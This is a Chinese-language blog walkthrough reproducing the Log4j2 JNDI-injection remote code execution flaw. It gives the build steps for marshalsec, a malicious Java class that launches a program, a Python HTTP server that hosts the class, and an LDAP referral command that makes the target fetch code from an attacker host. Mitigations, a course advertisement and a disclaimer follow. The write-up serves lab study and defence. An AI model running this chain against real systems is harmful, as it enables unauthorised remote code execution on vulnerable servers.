Apache Log4j2远程代码执行漏洞复现

漏洞原理

log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。

 

影响版本

Log4j2.x<=2.14.1

漏洞复现

漏洞分析的可以参考逐日实验室的这篇：https://mp.weixin.qq.com/s/1oesQz-UkpqKN3BQH9BKtw

准备环境

把受影响的jar包拖进随手建立的一个java项目，这里部署jar包步骤就不写了，网上一搜傻瓜式教程都有。

 

攻击机环境搭建，这里我用的vps（师兄的，因为我的是Windows。）复现环境的jdk版本最好<=8u191,基于ldap的利用方式，适用jdk版本：JDK 11.0.1、8u191、7u201、6u211之前。

这里我复现环境的java版本是

vps下载marshalsec(我这里已经安装好）：

git clone https://github.com/mbechler/marshalsec.git

然后安装maven：

apt-get install maven

然后使用maven编译marshalsec成jar包，我们先进入下载的marshalsec文件中运行：

mvn clean package -DskipTests

都成功后，编译恶意类代码robots.java

再用javac编译成robots.class文件

javac robots.java

import java.lang.Runtime;
import java.lang.Process;
public class robots{
 static {
 try {
 Runtime rt = Runtime.getRuntime();
 String[] commands = {"calc.exe"};
 Process pc = rt.exec(commands);
 pc.waitFor();
 } catch (Exception e) {
 // do nothing
 }
 }
}

搭建http服务传输恶意class文件

python -m SimpleHTTPServer 80

然后我们借助marshalsec项目，启动一个LDAP服务器，监听9999端口，这里的ip为vps的ip

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x/#robots" 9999

成功执行

跟fastjson复现步骤差不多，可以参考我fastjson的文章：https://www.freebuf.com/articles/web/283585.html

修复方法

截止到目前，网上的修复方法大致是这些：

补丁链接:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

1）添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true；

2）在应用classpath下添加log4j2.component.properties配置文件，文件内容为log4j2.formatMsgNoLookups=true；

3）JDK使用11.0.1、8u191、7u201、6u211及以上的高版本；

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，需要点击下方链接即可前往获取 

读者福利 | CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

同时每个成长路线对应的板块都有配套的视频提供： 

大厂面试题

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料

 所有资料共282G，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，可以扫描下方二维码或链接免费领取~ 

读者福利 | CSDN大礼包：《网络安全入门&进阶学习资源包》免费分享（安全链接，放心点击）

特别声明：

此教程为纯技术分享！本教程的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本教程的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失。